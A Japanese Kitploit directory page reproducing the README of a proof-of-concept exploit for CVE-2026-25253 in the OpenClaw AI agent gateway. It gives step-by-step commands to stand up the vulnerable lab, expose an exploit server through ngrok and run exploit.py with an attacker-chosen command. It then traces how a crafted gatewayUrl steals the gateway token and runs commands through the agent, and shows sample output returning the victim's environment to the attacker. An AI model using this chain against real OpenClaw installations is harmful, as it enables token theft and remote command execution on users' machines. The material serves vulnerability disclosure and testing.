Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-25253 — OpenClaw 認証トークンの外部漏洩 | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2026-25253
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

OpenClaw 認証トークンの外部漏洩

リポジトリを見る
23ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-25253 OpenClaw 1-Click RCE

★ CVE-2026-25253 OpenClaw 1-Click リモートコード実行 PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

説明

CVE-2026-25253 : OpenClaw 認証トークン外部流出の脆弱性

説明: OpenClaw(別名 clawdbot または Moltbot)v2026.1.29 より前のバージョンでは、攻撃者が細工した gatewayUrl クエリ文字列値を Control UI に供給することで、保存されているゲートウェイ認証トークンを外部に流出させることができます。Control UI は、検証やユーザー確認なしで自動的に WebSocket 接続を確立します。これにより、不正なゲートウェイアクセスや 1-Click リモートコード実行が可能になります。

要件

  • Docker(Windows の場合は Docker Desktop)
  • Python 3.x(攻撃側)

ファイル

  • Dockerfile — 脆弱な OpenClaw 環境を構築するための Dockerfile
  • templates/ — exploit で使用される悪意のある Web ページ
  • config.txt — 被害者環境で使用される OpenClaw 設定
  • exploit.py — exploit サーバー
  • requirements.txt — PoC の依存関係

環境構築

  1. Docker イメージをビルド
root@kitploit:~
docker build -t openclaw-vuln .
  1. 環境を実行(Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. SSH トンネルを作成
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • パスワード: openclawlab
  1. OpenClaw Control UI にアクセス ブラウザで次の URL を開きます
root@kitploit:~
http://127.0.0.1:18789/
  1. ゲートウェイトークン d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66 を入力する
  2. Connect をクリックする
  3. Config タブを開く
  4. config.txt の内容を貼り付ける
  5. APIキー欄を自身の OpenAI APIキーに置き換える
  6. 設定を保存する
  7. エージェントが正常に応答することを確認する

概念実証(PoC)

  1. 依存関係をインストール(攻撃側)
root@kitploit:~
pip3 install -r requirements.txt
  1. exploit サーバーを HTTPS で公開
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 生成されたフォワーディングホスト名をコピーする
  1. exploit サーバーを実行
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

例:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 攻撃を発動する
  1. exploit サーバーが公開する悪意のあるページを開く
  2. 被害者がページとやり取りする操作をシミュレートする
  3. ブラウザから exploit フローを発動する

攻撃フロー

  1. 悪意のある URL によって被害者の Control UI の gatewayUrl が変更される
  2. ブラウザは攻撃者が制御する WebSocket エンドポイントに自動的に接続する
  3. ゲートウェイ認証トークンが攻撃者に漏えいする
  4. 悪意のあるページは、盗んだトークンを使用して被害者のローカル OpenClaw ゲートウェイへの新しい WebSocket 接続を開く
  5. エージェントを介してコマンド実行リクエストが送信される
  6. 実行結果が攻撃者サーバーに返される

期待される結果

  • 被害者のブラウザが悪意のある WebSocket フローにリダイレクトされる
  • ゲートウェイ認証トークンが攻撃者に取得される
  • 攻撃者は OpenClaw を介してコマンド実行リクエストを送信できる
  • コマンドの出力が攻撃者サーバーに返される

サンプル出力

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

注記

  • この PoC は OpenClaw 2026.1.24-1 を対象としている
  • この exploit チェーンは Control UI の脆弱な gatewayUrl 処理に依存している
  • リモートの被害者にアクセスするには、悪意のあるページを HTTPS で配信する必要がある
  • ローカルの OpenClaw ゲートウェイには、被害者のブラウザをブリッジとして到達する

EQST Insight

当社は CVE とマルウェア分析を毎月公開しています。ご興味があれば、以下のリンクから当社の出版物をご覧ください。

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
ツールをダウンロード